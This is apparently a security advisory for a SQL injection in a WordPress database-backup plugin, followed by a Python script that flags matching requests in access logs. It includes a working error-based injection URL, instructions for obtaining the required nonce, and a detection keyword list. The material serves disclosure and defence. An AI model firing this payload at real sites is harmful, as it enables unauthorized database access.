The plugin does not properly sanitise and escape the fragment parameter before using it in a SQL statement in the admin dashboard, leading to a SQL injection issue.
https://example.com/wp-admin/?fragment=select updatexml(1,concat(0x7e,(select user())),0)::2.txt&_wpnonce=7347278aca

The nonce can be retrieved from the “Backup Now” and “Scheduled Backup” tabs of the plugin (/wp-admin/tools.php?page=wp-db-backup); look for action=save_backup_time&_wpnonce= in the page source.
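To review access logs for requests of this shape, the following added example (not part of the original advisory or the plugin's code) flags /wp-admin/ requests whose fragment parameter contains SQL syntax or characters outside an identifier-like allowlist. The function name, the allowlist, the keyword list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate fragment value is made of identifier-like tokens
# (table name, segment number, file name) joined by colons.
SAFE_FRAGMENT = re.compile(r"[A-Za-z0-9_.:\-]*")
# Tokens seen in the advisory's request plus common SQL syntax.
SQL_TOKENS = re.compile(
    r"\b(select|union|updatexml|extractvalue|concat|sleep)\b|[()']", re.I
)
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_fragment_requests(log_lines):
    """Return (line_number, decoded_fragment, reason) for each flagged line."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.startswith("/wp-admin/"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("fragment", []):
            if SQL_TOKENS.search(value):
                hits.append((number, value, "sql-token"))
            elif not SAFE_FRAGMENT.fullmatch(value):
                hits.append((number, value, "unexpected-character"))
    return hits


# Constructed sample lines (documentation addresses, made-up nonces).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/?fragment=wp_posts:0:backup.sql&_wpnonce=aaaaaaaaaa HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-admin/?fragment=select%20updatexml(1,concat(0x7e,(select%20user())),0)::2.txt&_wpnonce=bbbbbbbbbb HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/?fragment=wp_posts%60:0:x.txt&_wpnonce=cccccccccc HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?fragment=select HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in suspicious_fragment_requests(SAMPLE_LOG):
        print(hit)
```

Because the request needs a valid nonce from the plugin's admin page, any hit also indicates an authenticated admin session worth correlating with login records.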